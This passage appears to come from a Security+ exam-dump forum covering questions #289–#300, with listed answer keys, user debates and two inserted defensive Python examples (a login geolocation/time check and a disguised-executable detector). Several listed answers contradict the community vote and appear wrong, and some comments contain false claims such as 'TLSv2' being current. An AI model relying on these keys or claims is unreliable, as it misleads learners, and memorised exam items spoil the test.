sauna28 1 month, 3 weeks ago
Agreed, answer is D
upvoted 2 times

zaac22 2 months ago
C: data custodian
upvoted 1 times

techygirl 2 months ago
Selected Answer: C
DATA CUSTODIAN is correct
upvoted 3 times

Lv2023 2 months ago
Selected Answer: C
Data custodian is responsible for enforcing access control, encryption, and backup/recovery measures. Hence the engineer is acting as a data
custodian when he or she fulfills the data owner's request of encrypting the data.
upvoted 2 times

Question #289 Topic 1

An organization with a low tolerance for user inconvenience wants to protect laptop hard drives against loss or data theft. Which of the following
would be the MOST acceptable?

A. SED

B. HSM

C. DLP

D. TPM

Correct Answer: B

Community vote distribution: A (61%), D (39%)

FMMIR Highly Voted 1 month, 3 weeks ago
Selected Answer: A
A. SED (self-encrypting drive) would be the most acceptable option for an organization with a low tolerance for user inconvenience that wants to
protect laptop hard drives against loss or data theft. SEDs are hardware-based encryption devices that automatically encrypt data on a hard
drive without requiring any additional input or configuration from the user. This means that the user does not have to perform any additional steps
to encrypt their data, which can help to prevent data loss or theft. By contrast, other options like HSM (hardware security module), DLP (data loss
prevention), and TPM (trusted platform module) may require more user involvement and may not be as convenient for users.
upvoted 9 times

ronniehaang Most Recent 3 days, 22 hours ago
Selected Answer: A
The most acceptable option for the organization to protect laptop hard drives against loss or data theft would be SED (Self-Encrypting Drive).
SED provides hardware-level encryption of the entire hard drive, and it is transparent to the user. This means that the user does not have to take
any additional steps to encrypt their data, and the encryption process does not affect the performance of the laptop. Additionally, SEDs are
tamper-resistant and provide protection against theft and loss of data. This makes them an ideal solution for organizations with low tolerance for
user inconvenience.
upvoted 1 times

IzaacL23 1 month, 1 week ago
Selected Answer: A
100% SED
upvoted 1 times

nicekoda 1 month, 1 week ago
The answer is A, TPM is a built-in component on a SED to speed up cryptographic operations and protect keys while SED can be utilized to
encrypt and decrypt the stored data, occurring within the device and without dependence on a connected information system.
upvoted 2 times

Jimbobilly 1 month, 3 weeks ago
Selected Answer: A
See FMMIR response
upvoted 2 times

[Removed] 1 month, 3 weeks ago
Selected Answer: D
TPM is the Answer
upvoted 1 times

GetBuckets 1 month, 3 weeks ago
I find this question annoying as SED, TPM and HSM are things to consider, but I’m going with SED as per Ian Neil’s book: “Exam Tip: Use SED to
protect the data on lost or stolen laptops. Only the user and vendor can decrypt the data.”

We would’ve decided better if the question provided more information about the use case, but it’s too generic. So I’d go by the book and choose
A.
upvoted 1 times

okay123 1 month, 3 weeks ago
Selected Answer: D
I think I will go with D because of the key words "user inconvenience."

A TPM isn’t something you have to think about much. Your computer either has a TPM or it doesn’t — and modern computers generally will. An
SED drive is an external drive connected to your laptop, that's a whole other situation.

" TPM is arguably more of a convenience feature. Storing the encryption keys in hardware allows a computer to automatically decrypt the drive,
or decrypt it with a simple password. It’s more secure than simply storing that key on the disk, as an attacker can’t simply remove the disk and
insert it into another computer. It’s tied to that specific hardware."

https://www.howtogeek.com/237232/what-is-a-tpm-and-why-does-windows-need-one-for-disk-encryption/

It was literally made to be convenient!
upvoted 4 times
[Removed] 1 month, 4 weeks ago
Having a TPM encrypts the login process, and it can encrypt the data within the device as well. Any unauthorised user cannot access the data
inside. Even if the device is lost or stolen, your data is protected with TPM.
upvoted 1 times

Done461 2 months ago
Selected Answer: A
SED the right answer
upvoted 2 times

Blueteam 2 months ago
Correct answer is A: SED
The emphasis is on user convenience. Self-Encrypting Drive is the most convenient.
upvoted 2 times

sterfryy 2 months ago
Selected Answer: A
Self-encrypting drive (SED)
upvoted 2 times

JSOG 2 months ago
Selected Answer: D
agree with TPM
upvoted 3 times

zaac22 2 months ago
A : SED includes the hardware and software to encrypt all data on the drive and
securely store the encryption keys. These typically allow users to enter
credentials when they set up the drive. When users power up the system,
they enter their credentials again to decrypt the drive and boot the system
upvoted 2 times

FMMIR 2 months ago
Selected Answer: D
A TPM (Trusted Platform Module) is used to improve the security of your PC. It's used by services like BitLocker drive encryption, Windows Hello,
and others, to securely create and store cryptographic keys, and to confirm that the operating system and firmware on your device are what
they're supposed to be, and haven't been tampered with.
upvoted 3 times

nicekoda 2 months ago
TPM is the correct answer. It protects the hard drive and data through encryption.
upvoted 3 times

nicekoda 2 months ago
I think HSM is actually the MOST suitable answer since you can’t apply TPM on a computer that is currently in use.
upvoted 1 times

Question #290 Topic 1

After segmenting the network, the network manager wants to control the traffic between the segments. Which of the following should the manager
use to control the network traffic?

A. A DMZ

B. A VPN

C. A VLAN

D. An ACL

Correct Answer: D

Community vote distribution: D (100%)

FMMIR 1 month, 3 weeks ago
Selected Answer: D
The network manager should use an Access Control List (ACL) to control the traffic between the segments. An ACL is a network filter that can be
used to control the flow of network traffic based on various criteria, such as the source or destination of the traffic, the type of traffic, or the port
number. By configuring an ACL, the network manager can specify which types of traffic are allowed to pass between the network segments and
which are not. This will help to prevent unauthorized or malicious traffic from passing between the segments and potentially compromising the
network. A DMZ, VPN, or VLAN would not be appropriate for controlling the traffic between the segments in this scenario.
upvoted 4 times

JSOG 2 months ago
Selected Answer: D
According to 2 sources
What is Access Control List (ACL) in networking? Access Control List or ACL is a network filter that is often used by network devices like routers
and switches to control network traffic. ACL can be used on a network interface to control the network traffic passing through the interface
upvoted 3 times

zaac22 2 months ago
D: use an ACL to control traffic between segments, VLAN is already implemented
upvoted 1 times

Question #291 Topic 1

Which of the following BEST describes when an organization utilizes a ready-to-use application from a cloud provider?

A. IaaS

B. SaaS

C. PaaS

D. XaaS

Correct Answer: B

Community vote distribution: B (100%)

Alizadeh 1 month, 2 weeks ago
Selected Answer: B
The use of a ready-to-use application from a cloud provider is an example of using software as a service (SaaS).

Software as a service (SaaS) is a type of cloud computing in which an organization uses a software application that is hosted and maintained by
a third-party provider. The organization accesses the application over the internet, typically through a web browser, and does not need to install
or maintain the software on their own servers or devices.
upvoted 1 times

sauna28 1 month, 3 weeks ago
Selected Answer: B
Software as a Service (SAAS)
- On demand software
- No local installation
- Central management of data and application
- SAAS: vendor is responsible for maintenance of apps, development of service
upvoted 1 times

FMMIR 1 month, 3 weeks ago
Selected Answer: B
When an organization utilizes a ready-to-use application from a cloud provider, it is using Software as a Service (SaaS). SaaS providers offer
applications that are pre-built and ready for use by customers. Customers can access these applications over the internet, typically through a
web browser, and pay only for the services they use. SaaS applications are often fully managed and maintained by the provider, so customers do
not need to worry about installing, configuring, or maintaining the applications themselves. In contrast, Infrastructure as a Service (IaaS), Platform
as a Service (PaaS), and Anything as a Service (XaaS) providers offer more generic services, such as storage, computing, or networking
resources, that customers can use to build and deploy their own applications.
upvoted 1 times

JSOG 2 months ago
Selected Answer: B
Correct answer is B
upvoted 1 times

zaac22 2 months ago
B: SaaS - totally managed by cloud provider, ready to use by customer
upvoted 1 times

Question #292 Topic 1

Which of the following BEST helps to demonstrate integrity during a forensic investigation?

A. Event logs

B. Encryption

C. Hashing

D. Snapshots

Correct Answer: C

Community vote distribution: C (100%)

sauna28 1 month, 3 weeks ago
Selected Answer: C
Hashing = Checksum = Integrity
upvoted 2 times

Done461 2 months ago
Selected Answer: C
Hashing using checksum
upvoted 1 times

HL2020 2 months ago
Selected Answer: C
Hashing provides integrity. C
upvoted 1 times

JSOG 2 months ago
Selected Answer: C
agree with C
upvoted 1 times

zaac22 2 months ago
C: hashing = integrity
upvoted 1 times

Question #293 Topic 1

Which of the following would be MOST effective to contain a rapidly spreading attack that is affecting a large number of organizations?

A. Machine learning

B. DNS sinkhole

C. Blocklist

D. Honeypot

Correct Answer: C

Community vote distribution: B (100%)

Lv2023 Highly Voted 2 months ago
Selected Answer: B
The question states that the attack is happening. A DNS sinkhole is a disruption technique that can be used to disrupt malware transmission at
the very point of connection. Moreover, it can route suspect traffic to a different network, such as a honeynet, where it can be analyzed. See the
following link: https://resources.infosecinstitute.com/topic/dns-sinkhole-can-protect-malware/
upvoted 10 times

Alizadeh Most Recent 1 month, 1 week ago
Selected Answer: B
A DNS sinkhole, also known as a DNS blackhole, is a security measure that involves redirecting traffic from malicious domains to a
predetermined location, such as a "blackhole" server that is not connected to the internet. DNS sinkholing can be an effective way to contain a
rapidly spreading attack that is affecting a large number of organizations. By redirecting traffic away from the malicious domains, it is possible to
prevent the attack from spreading and mitigate the impact on the affected organizations.
upvoted 1 times

FMMIR 1 month, 3 weeks ago
Selected Answer: B
A DNS sinkhole would be the most effective option to contain a rapidly spreading attack that is affecting a large number of organizations. A DNS
sinkhole is a type of security measure that involves redirecting traffic from malicious domains to a controlled environment, such as a "sinkhole"
server. This can help to prevent the spread of the attack by blocking access to the malicious domains and preventing users from inadvertently
accessing them.
upvoted 2 times

GetBuckets 1 month, 3 weeks ago
That’s B.

Quote from Ian Neil’s book:

“DNS Sinkhole: A DNS Blacklist can be created on a firewall so that it can identify malicious traffic trying to gain access to your network. A DNS
sinkhole can be created so that it either returns false information to the attacker or forwards the malicious traffic to a honeypot or honeynet,
thereby protecting your network against an attack.”
upvoted 1 times

zaac22 2 months ago
B. DNS sinkhole
upvoted 1 times

Question #294 Topic 1

A network administrator has been alerted that web pages are experiencing long load times. After determining it is not a routing or DNS issue, the
administrator logs in to the router, runs a command, and receives the following output:

CPU 0 percent busy, from 300 sec ago
1 sec ave: 99 percent busy
5 sec ave: 97 percent busy
1 min ave: 83 percent busy

Which of the following is the router experiencing?

A. DDoS attack

B. Memory leak

C. Buffer overflow

D. Resource exhaustion

Correct Answer: D

Community vote distribution: D (100%)

FMMIR Highly Voted 1 month, 3 weeks ago
Selected Answer: D
The router is experiencing a resource exhaustion issue. The output from the command indicates that the CPU is consistently busy, with a 1-
second average of 99 percent busy and a 1-minute average of 83 percent busy. This indicates that the router is struggling to keep up with the
demands placed on it, potentially due to a high volume of traffic or other factors. As a result, web pages are experiencing long load times. This is
an example of resource exhaustion, where the router's resources are being overwhelmed and are unable to meet the demands placed on them. A
DDoS attack, memory leak, or buffer overflow would not typically cause the symptoms described in the scenario.
upvoted 5 times

[Removed] Most Recent 1 month, 3 weeks ago
Selected Answer: D
I believe it's D. If you pay attention, it says CPU 0% 300 secs ago… Again! 300 SECS AGOOO… But in the averages after that it's stating
that it's busy at 99, 97 and 83, which brings me to the conclusion that it's resource exhaustion. That is an example of a Denial of Service attack
(DoS).
upvoted 1 times

[Removed] 1 month, 3 weeks ago
Not DDoS!! Just DoS… That's why it's D…
upvoted 1 times

Blueteam 2 months ago
The correct answer is B: Memory Leak
The router is not busy so there is no consumption of the memory however it can't release the memory blocks. This is a memory leak issue.
upvoted 2 times

Sandon 1 week, 1 day ago
The question does not mention memory, therefore B. Memory Leak is wrong.
upvoted 1 times

Done461 2 months ago
Nope, resource exhaustion is correct. As per the question, CPU is at 0%, therefore it's resource exhaustion
upvoted 1 times

Blueteam 1 month, 4 weeks ago
CPU is at 0% it means CPU is available. CPU at 100% means CPU is fully occupied.
Here CPU is not busy. This is not exhaustion. It means that memory blocks can't release the previously stored data. So it is memory leak.
A memory leak occurs when a process allocates memory from the paged or nonpaged pools, but doesn't free the memory. As a result,
these limited pools of memory are depleted over time, causing Windows to slow down. If memory is completely depleted, failures may
result.
upvoted 2 times

Sandon 1 month, 3 weeks ago
Negative Ghost Rider
upvoted 1 times
JSOG 2 months ago
Selected Answer: D
Resource exhaustion attacks are computer security exploits that crash, hang, or otherwise interfere with the targeted program or system. They
are a form of denial-of-service attack but are different from distributed denial-of-service attacks, which involve overwhelming a network host such
as a web server with requests from many locations.
upvoted 2 times

Question #295 Topic 1

The Chief Executive Officer (CEO) of an organization would like staff members to have the flexibility to work from home anytime during business
hours, including during a pandemic or crisis. However, the CEO is concerned that some staff members may take advantage of the flexibility and
work from high-risk countries while on holiday or outsource work to a third-party organization in another country. The Chief Information Officer
(CIO) believes the company can implement some basic controls to mitigate the majority of the risk. Which of the following would be BEST to
mitigate the CEO's concerns? (Choose two.)

A. Geolocation

B. Time-of-day restrictions

C. Certificates

D. Tokens

E. Geotagging

F. Role-based access controls

Correct Answer: CE

Community vote distribution: AB (100%)

560exam Highly Voted 2 months ago
Selected Answer: AB
The correct answer is AB imo.
Geolocation, time-of-day restriction.
upvoted 6 times

zaac22 2 months ago
I agree with AB
upvoted 1 times

ZDW Most Recent 1 week, 3 days ago
I would like to clarify for Madmax's answer; time-of-day restrictions would not prevent someone from a different time zone from working on the
system, it would simply require them to adjust their hours accordingly. It does, however, prevent someone from working on holidays, as the
question mentions
upvoted 2 times

madmax1984 2 weeks, 2 days ago
Selected Answer: AB
A & B because Geolocation reveals more specific data relating to their location, such as their current city or state. Time of Day prevents
someone in another time zone from performing outsourced work. Geotagging labels your location for the purpose of adding geographical details to a
photo, a video, or any media in the form of metadata.
upvoted 2 times

Done461 2 months ago
Selected Answer: AB
AB Is the correct answer
upvoted 1 times

FMMIR 2 months ago
Selected Answer: AB
AB are correct
upvoted 1 times
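An added example (not from ExamTopics or any commenter) of how the two controls the thread settles on, geolocation and time-of-day restrictions, would be evaluated together on a login event. The office time zone (modelled as a fixed UTC-5 offset), the allowed countries, the business-hours window and the login events are all constructed assumptions; it also shows ZDW's point that the window is measured in the office's time zone, not the user's.

```python
"""Evaluate remote logins against a geolocation allowlist and an office-hours window."""
from datetime import datetime, time, timedelta, timezone
from typing import Dict, List, Tuple

# Constructed policy values (assumptions, not from the question). The office zone is a
# fixed UTC-5 offset so the sample runs without a tz database; a real deployment would
# use zoneinfo so that daylight-saving shifts are handled.
OFFICE_TZ = timezone(timedelta(hours=-5), "EST")
ALLOWED_COUNTRIES = {"US", "CA"}
BUSINESS_START, BUSINESS_END = time(8, 0), time(18, 0)

# Constructed sample events: the country is what a GeoIP lookup of the source address
# would return (stubbed as a field here) and the login time is recorded in UTC.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"user": "alice", "country": "US", "utc": "2023-01-10T14:00:00"},  # Tue 09:00 office time
    {"user": "bob",   "country": "US", "utc": "2023-01-10T03:00:00"},  # Mon 22:00 office time
    {"user": "carol", "country": "XX", "utc": "2023-01-10T15:30:00"},  # placeholder high-risk country
    {"user": "dave",  "country": "CA", "utc": "2023-01-14T15:00:00"},  # Sat 10:00 office time
]


def evaluate(country: str, utc_stamp: str) -> Tuple[bool, str]:
    """Return (allowed, reason) for one login.

    The geolocation check runs first, then the time-of-day check. Both are applied in
    the office's time zone, so a user abroad must keep office hours rather than their
    local hours; this is what stops "work from holiday" logins at odd hours.
    """
    if country not in ALLOWED_COUNTRIES:
        return False, f"geolocation: {country} is not in the allowlist"
    when_utc = datetime.fromisoformat(utc_stamp).replace(tzinfo=timezone.utc)
    local = when_utc.astimezone(OFFICE_TZ)
    if local.weekday() >= 5:  # Monday=0 ... Saturday=5, Sunday=6
        return False, f"time-of-day: {local:%A} is outside the working week"
    if not (BUSINESS_START <= local.time() < BUSINESS_END):
        return False, f"time-of-day: {local:%H:%M} office time is outside business hours"
    return True, "ok"


def evaluate_all(events: List[Dict[str, str]]) -> Dict[str, Tuple[bool, str]]:
    """Apply the policy to every event, keyed by user name."""
    return {e["user"]: evaluate(e["country"], e["utc"]) for e in events}


if __name__ == "__main__":
    for user, (allowed, reason) in evaluate_all(SAMPLE_EVENTS).items():
        print(f"{user:6s} {'ALLOW' if allowed else 'DENY ':5s} {reason}")
```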

Question #296 Topic 1

While checking logs, a security engineer notices a number of end users suddenly downloading files with the .tar.gz extension. Closer examination
of the files reveals they are PE32 files. The end users state they did not initiate any of the downloads. Further investigation reveals the end users
all clicked on an external email containing an infected MHT file with an href link a week prior. Which of the following is MOST likely occurring?

A. A RAT was installed and is transferring additional exploit tools.

B. The workstations are beaconing to a command-and-control server.

C. A logic bomb was executed and is responsible for the data transfers.

D. A fileless virus is spreading in the local network environment

Correct Answer: D

Community vote distribution: A (80%), C (20%)

560exam Highly Voted 2 months ago
Selected Answer: A
Going with A on this one. It makes the most sense to me.
RATs are typically downloaded together with a seemingly legitimate program, like a game, or are sent to the target as an email attachment. Once
the attacker compromises the host's system, they can use it to distribute RATs to additional vulnerable computers, establishing a botnet.
upvoted 7 times

sauna28 Most Recent 1 month, 3 weeks ago
Selected Answer: C
I'd go for Logic Bomb, because it's about timing, hence C is the answer from my POV. A logic bomb is malicious code that waits for the right time
or the right opportunity to strike.
upvoted 2 times

GetBuckets 1 month, 3 weeks ago
I’d go A as well. Makes more sense.
upvoted 1 times

FMMIR 1 month, 3 weeks ago
Selected Answer: A
It is most likely that a Remote Access Trojan (RAT) was installed and is transferring additional exploit tools. RATs are malicious programs that
allow an attacker to remotely control a computer and access its files and data. In this scenario, the end users clicked on a malicious link in an
email, which likely installed a RAT on their machines. The RAT is now downloading additional exploit tools, which are typically used to
compromise other systems or steal sensitive information. This is the most likely explanation for the sudden appearance of .tar.gz files on the end
users' machines.
upvoted 1 times

Lv2023 1 month, 3 weeks ago
Going with C logic bomb. The scenario states that the users did not initiate any downloads. It goes on to state further investigation shows that all
users clicked on an external mail which had an infected file a week prior. Here is what the Comptia Study guide has to say about logic bomb:
Some types of malware do not trigger automatically. Having infected a system, they wait for a pre-configured time or date (time bomb) or a
system or user event (logic bomb). A logic bomb isn't necessarily malicious code but could be an event that triggers an undesirable event.
upvoted 3 times

560exam 2 months ago
Going with A on this one. It makes the most sense to me.
RATs are typically downloaded together with a seemingly legitimate program, like a game, or are sent to the target as an email attachment. Once
the attacker compromises the host's system, they can use it to distribute RATs to additional vulnerable computers, establishing a botnet.
upvoted 2 times
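The scenario in Question #296 turns on a file whose extension (.tar.gz) does not match its content (a PE32 executable). The check below is an added example, not code from the ExamTopics page or any commenter: it inspects the first bytes of a download for the gzip magic number and for the DOS "MZ" stub plus the "PE\0\0" signature that Windows executables carry, and flags archives that are really executables. The sample downloads are constructed in-code so the script runs offline; the verdict strings and function names are this example's own choices.

```python
"""Flag downloads whose content does not match their extension.

Added example for the Question #296 discussion (a .tar.gz that is really a
PE32 executable); it is not part of the ExamTopics page. Sample files are
constructed in-code so the check runs offline.
"""
import gzip
import struct

GZIP_MAGIC = b"\x1f\x8b"


def is_gzip(data: bytes) -> bool:
    """True if the bytes start with the gzip magic number."""
    return data[:2] == GZIP_MAGIC


def is_pe(data: bytes) -> bool:
    """True if the bytes carry a DOS 'MZ' stub and a 'PE\\0\\0' signature.

    The PE header offset is the 32-bit little-endian e_lfanew field at 0x3C.
    This does not distinguish PE32 from PE32+; both share the signature.
    """
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    pe_offset = struct.unpack_from("<I", data, 0x3C)[0]
    return data[pe_offset:pe_offset + 4] == b"PE\x00\x00"


def classify_download(filename: str, data: bytes) -> str:
    """Return one of 'ok', 'pe', 'pe-masquerading-as-archive', 'unknown'."""
    name = filename.lower()
    claims_gzip = name.endswith((".gz", ".tgz"))
    if is_pe(data):
        # An executable named like an archive is the pattern from the question.
        return "pe-masquerading-as-archive" if claims_gzip else "pe"
    if claims_gzip and is_gzip(data):
        return "ok"
    return "unknown"


def fake_pe32() -> bytes:
    """Constructed minimal PE-like blob: MZ stub, e_lfanew=0x40, PE signature."""
    header = bytearray(0x40)
    header[:2] = b"MZ"
    struct.pack_into("<I", header, 0x3C, 0x40)
    return bytes(header) + b"PE\x00\x00" + b"\x00" * 20


def scan_downloads(downloads):
    """downloads: iterable of (filename, bytes) -> list of (filename, verdict)."""
    return [(name, classify_download(name, data)) for name, data in downloads]


# Constructed sample downloads: one genuine gzip archive, one executable
# named as an archive, and one plainly named executable.
SAMPLE_DOWNLOADS = [
    ("report.tar.gz", gzip.compress(b"plain text archive")),
    ("update.tar.gz", fake_pe32()),
    ("tool.exe", fake_pe32()),
]

if __name__ == "__main__":
    for name, verdict in scan_downloads(SAMPLE_DOWNLOADS):
        print(f"{name}: {verdict}")
```

Magic-byte inspection is cheap enough to run on every download recorded by a proxy or EDR, and a mismatch verdict is a far stronger alert than the extension alone, since the engineer in the question only discovered the PE32 content on "closer examination".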


Question #297 Topic 1

A business is looking for a cloud service provider that offers a la carte services, including cloud backups, VM elasticity, and secure networking.
Which of the following cloud service provider types should the business engage?

A. IaaS

B. PaaS

C. XaaS

D. SaaS

Correct Answer: A

Community vote distribution: A (54%) C (46%)

ronniehaang 3 days, 22 hours ago
Selected Answer: A
A. IaaS (Infrastructure-as-a-Service) is the best option for a business looking for a cloud service provider that offers a la carte services including
cloud backups, VM elasticity, and secure networking. IaaS provides a full range of infrastructure resources such as computing, storage, and
networking, as well as other essential services like security and data protection. The business has the flexibility to select only the services it
requires, allowing for a customized and cost-effective solution.
upvoted 1 times

madmax1984 2 weeks, 2 days ago
Selected Answer: C
Going with C. Question did hint secure networking and anything with security falls into XaaS.
upvoted 1 times

PraygeForPass 2 weeks, 5 days ago
Selected Answer: C
Shouldn't this be XaaS?
Since they want any service instead of getting a specific package like SaaS/PaaS/IaaS
A la carte is definitely the keyword here
upvoted 2 times

Renfri 1 month, 3 weeks ago
Selected Answer: C
"A la carte" service means you can get any service you want from what the provider offers. XaaS :)
upvoted 3 times

sauna28 1 month, 3 weeks ago
Selected Answer: A
IAAS or HAAS – Outsource your equipment BUT you are still responsible for the management and security.
Although data is in that IAAS cloud BUT IT IS MORE IN YOUR CONTROL.
Eg IAAS: A good example of infrastructure as a service might be a web service provider that gives you a server but nothing else. You still have to
load the operating system and the applications that are running on that operating system. And then you pay the web service provider a certain
amount a month to be able to have that system running in the cloud.
upvoted 1 times

FMMIR 1 month, 3 weeks ago
Selected Answer: A
The best cloud service provider type for a business that is looking for a la carte services including cloud backups, VM elasticity, and secure
networking is Infrastructure as a Service (IaaS). IaaS providers offer a wide range of services, including storage, networking, and computing
resources, that can be customized and scaled to meet the specific needs of a business. This allows businesses to select the specific services
they need, such as cloud backups and secure networking, and pay only for the services they use. In contrast, Platform as a Service (PaaS) and
Software as a Service (SaaS) providers offer more limited sets of services and do not typically allow for the same level of customization and
control as IaaS providers. XaaS, or Anything as a Service, is a broad term that encompasses many different types of cloud services, including
IaaS, PaaS, and SaaS, so it is not a specific type of provider.
upvoted 1 times

GetBuckets 1 month, 3 weeks ago
That’s A. Infrastructure as a Service. The moment your hear networking provided by the cloud provider, that’s IaaS. Networking, servers and
storage belong to the infrastructure.
upvoted 1 times

nunulong 1 month, 4 weeks ago
Selected Answer: A
Since the question mentioned the business is looking for la carte service including cloud backups, VM elasticity, and secure networking. IaaS
would be the most flexible option the company could choose to configure those services with full customization to reduce the cost and avoid
unused services the company still has to pay for. I would go with IaaS.
upvoted 4 times


Question #298 Topic 1

A research company discovered that an unauthorized piece of software has been detected on a small number of machines in its lab. The
researchers collaborate with other machines using port 445 and on the Internet using port 443. The unauthorized software is starting to be seen
on additional machines outside of the lab and is making outbound communications using HTTPS and SMB. The security team has been instructed
to resolve the problem as quickly as possible while causing minimal disruption to the researchers. Which of the following contains the BEST
course of action in this scenario?

A. Update the host firewalls to block outbound SMB.

B. Place the machines with the unapproved software in containment.

C. Place the unauthorized application in a blocklist.

D. Implement a content filter to block the unauthorized software communication.

Correct Answer: A

Community vote distribution: C (52%) B (48%)

HL2020 Highly Voted 1 month, 4 weeks ago
Selected Answer: C
I'm guessing C. A isn't correct since we're asked not to disrupt researchers who are using SMB. B would again disrupt and D doesn't really make
sense.
upvoted 5 times

Ranaer Most Recent 2 days, 22 hours ago
Selected Answer: B
I think B is the most appropriate action to be taken here. Everyone seems to be latching to the idea of "minimal disruption". Minimal doesn't mean
no disruption. Yeah, some people's workstations won't be accessible or working for some time, but it would instantly prevent the spread and allow
for quick eradication and restoration to last known good backup.
upvoted 1 times

ronniehaang 3 days, 22 hours ago
Selected Answer: B
B. Place the machines with the unapproved software in containment.

Containing the machines with the unapproved software would minimize the spread of the software to other machines and prevent any potential
harm it might cause to the network. Containment can be achieved by disconnecting the affected machines from the network, either physically or
by modifying firewall rules, until the source of the software can be identified and a plan can be developed to remove it. This will also allow the
security team to perform an analysis on the unauthorized software and assess the potential harm it could cause to the network and data. By
containing the affected machines, the security team can minimize disruption to the researchers while resolving the issue as quickly as possible.
upvoted 1 times

madmax1984 2 weeks, 2 days ago
Selected Answer: C
It's C, as the question states "The security team has been instructed to resolve the problem as quickly as possible while causing minimal
disruption to the researchers."
upvoted 2 times

RvR109 3 weeks ago
Selected Answer: B
B. Place the machines with the unapproved software in containment.

Placing the machines with the unauthorized software in containment is the best course of action in this scenario, as it will prevent the software
from communicating with other machines in the lab and on the Internet, while minimizing disruption to the researchers. This can be done by
disconnecting the affected machines from the network, or by using software-based containment solutions that restrict the software's access to
network resources.
upvoted 2 times

80drag 4 weeks, 1 day ago
The answer will be C, unless the virus is so damaging that it's gonna cause the company lots of money. Only then would you contain the
device.

The best resolution is just to add it to the blocklist currently. Then during the company's down time when the researchers are not working you
would then solve the issue.
Think of viruses in work world as Low and High severity on impact.

B would only ever be used if the machines had ransomware, cryptomalware, Trojans, etc. Anything that would cause mid to high impact would
be containment.

For our situation this is affecting a few devices and is not causing huge amounts of damage currently; for this reason we put it on the blocklist to
stop it currently.
upvoted 2 times

80drag 4 weeks, 1 day ago
For our situation this is affecting a few devices and is not causing huge amounts of damage currently; for this reason we put it on the block
"List" to stop it currently.
upvoted 1 times

80drag 4 weeks, 1 day ago
Also another reason why this is B "minimal disruption to the researchers. "

This is the key hint in the question, containment devices will cause HUGE disruptions for the researchers
upvoted 2 times

80drag 4 weeks, 1 day ago
Sorry, I meant "Also another reason why this is C"
upvoted 2 times

viksap 1 month, 2 weeks ago
Selected Answer: B
Whitelisting is better than blocklist. Having containment will isolate infected machines and prevent the spread
upvoted 1 times

Alizadeh 1 month, 2 weeks ago
Selected Answer: B
In this scenario, the best course of action would be to place the machines with the unauthorized software in containment.

Containment involves isolating the affected machines from the rest of the network in order to prevent the unauthorized software from spreading
to other machines. This can be done by physically disconnecting the affected machines from the network, or by using virtual LANs (VLANs) or
other network segmentation techniques to create a separate network for the affected machines.
upvoted 1 times

kholdsnare 1 month, 3 weeks ago
Selected Answer: C
B would be the answer if "while causing minimal disruption to the researchers" wasn't part of the question.
C is the only choice that makes sense under these conditions
upvoted 3 times

FMMIR 1 month, 3 weeks ago
Selected Answer: B
The best course of action in this scenario would be to place the machines with the unauthorized software in containment. This will prevent the
software from spreading to other machines and causing further disruption. Additionally, the security team can investigate the source of the
software and take steps to remove it from the affected machines. This will minimize disruption to the researchers and help to prevent the problem
from spreading. Options A, C, and D may also be effective in certain cases, but placing the affected machines in containment is likely the most
effective solution in this scenario.
upvoted 3 times

GetBuckets 1 month, 3 weeks ago
Yep. That’s C. See HL2020 notes down below.
upvoted 1 times

okay123 1 month, 3 weeks ago
Selected Answer: C
C makes the most sense
upvoted 4 times

sterfryy 1 month, 3 weeks ago
Selected Answer: B
The best course of action in this scenario is to place the machines with the unauthorized software in containment. This will prevent the software
from spreading to other machines or communicating with external systems, reducing the risk of further damage or disruption. The security team
can then investigate the machines in containment and take appropriate action to remove the unauthorized software and secure the affected
machines. Blocking outbound SMB or implementing a content filter may help to prevent the spread of the unauthorized software, but they may
also disrupt the researchers' work and should be used as a last resort.
upvoted 4 times


Question #299 Topic 1

A security analyst has been reading about a newly discovered cyberattack from a known threat actor. Which of the following would BEST support
the analyst's review of the tactics, techniques, and protocols the threat actor was observed using in previous campaigns?

A. Security research publications

B. The MITRE ATT&CK framework

C. The Diamond Model of Intrusion Analysis

D. The Cyber Kill Chain

Correct Answer: B

Community vote distribution: B (100%)

FMMIR Highly Voted 2 months ago
Selected Answer: B
The MITRE ATT&CK Framework was created by MITRE in 2013 to document attacker tactics and techniques based on real-world observations.
This index continues to evolve with the threat landscape and has become a renowned knowledge base for the industry to understand attacker
models, methodologies, and mitigation.
upvoted 5 times

madmax1984 Most Recent 2 weeks, 2 days ago
Selected Answer: B
B is correct.
upvoted 1 times

sauna28 1 month, 3 weeks ago
Selected Answer: B
• MITRE’s Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK™) is a curated knowledge base and model for cyber adversary
behavior, reflecting the various phases of an adversary’s lifecycle and the platforms they are known to target. ATT&CK is useful for understanding
security risk against known adversary behavior, for planning security improvements, and verifying defenses work as expected
upvoted 1 times

sauna28 1 month, 3 weeks ago
The Diamond Model of Intrusion Analysis is a model to describe cyber attacks. It contains 4 parts - adversary, infrastructure, capability, and
target. It gives analysts a comprehensive view of cyber attacks.
Adversary: Where are attackers from? Who are the attackers? Who is the sponsor? Why attack? What is the activity timeline and planning?
Infrastructure: Infected computer(s), C2 domain names, location of C2 servers, C2 server types, mechanism and structure of C2, data
management & control, and data leakage paths
Capability: What skills do the attackers have to do reconnaissance, deliver their attacks, attack exploits and vulnerabilities, deploy their remote-
controlled malwares and backdoors, and develop their tools.
Target: Who is their target country/region, industry sector, individual, or data
upvoted 1 times


Question #300 Topic 1

A security analyst is hardening a network infrastructure. The analyst is given the following requirements:

• Preserve the use of public IP addresses assigned to equipment on the core router.
• Enable "in transport" encryption protection to the web server with the strongest ciphers.

Which of the following should the analyst implement to meet these requirements? (Choose two.)

A. Configure VLANs on the core router.

B. Configure NAT on the core router.

C. Configure BGP on the core router.

D. Enable AES encryption on the web server.

E. Enable 3DES encryption on the web server.

F. Enable TLSv2 encryption on the web server.

Correct Answer: BF

Community vote distribution: BF (64%) CF (36%)

madmax1984 2 weeks, 2 days ago
Selected Answer: BF
B and F are correct.
upvoted 1 times

FMMIR 1 month, 3 weeks ago
Selected Answer: CF
To meet the requirements, the analyst should configure BGP on the core router (choice C) and enable TLSv2 encryption on the web server
(choice F).

BGP, or Border Gateway Protocol, is a routing protocol that is used to exchange routing and reachability information among autonomous
systems on the Internet. It is typically used on the core routers of a network infrastructure to ensure that traffic is routed efficiently and securely.
By configuring BGP on the core router, the analyst can ensure that the public IP addresses assigned to equipment on the router are preserved
and that traffic is routed securely.

TLS, or Transport Layer Security, is a cryptographic protocol that provides secure communication over the Internet. TLSv2 is the most recent
